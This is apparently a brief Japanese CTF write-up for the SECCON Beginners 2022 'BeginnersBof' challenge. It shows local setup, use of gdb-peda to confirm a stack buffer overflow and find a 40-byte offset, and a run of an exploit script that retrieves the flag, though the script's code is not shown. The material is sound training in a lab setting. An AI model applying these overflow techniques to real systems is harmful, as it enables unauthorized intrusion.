問題のセットアップ $ git clone https://github.com/SECCON/Beginners_CTF_2022 $ cd Beginners_CTF_2022/pwnable/BeginnersBof $ docker-compose up -d $ nc localhost 9000 How long your name?
pedaによる解析(BOFの確認) 1. sizeは適当に51で指定 2. ‘a’を50個+改行 入力した結果 gdb-peda$ c Continuing. How long is your name? 51 What's your name? aaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaa
pedaによる解析(オフセットの特定) pattoコマンドで オフセットを確認できる RSPの”AA0AAFAAbA” へのオフセットは40bytes gdb-peda$ r gdb-peda$ c Continuing. How long is your name? 51 What's your name? AAA%AAsAABAA$AAnAACAA-AA(A ADAA;AA)AAEAAaAA0AAFAAbA gdb-peda$ patto AA0AAFAAbA AA0AAFAAbA found at offset: 40
Exploit! $ ls chall exploit.py $ python3 ./exploit.py [*] '/home/lilium/src/github.com/SECCON/Beginners_CTF_2022/pwnable/BeginnersBof/exploit/chall' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to localhost on port 9000: Done ctf4b{Y0u_4r3_4lr34dy_4_BOF_M45t3r!} [*] Closed connection to localhost port 9000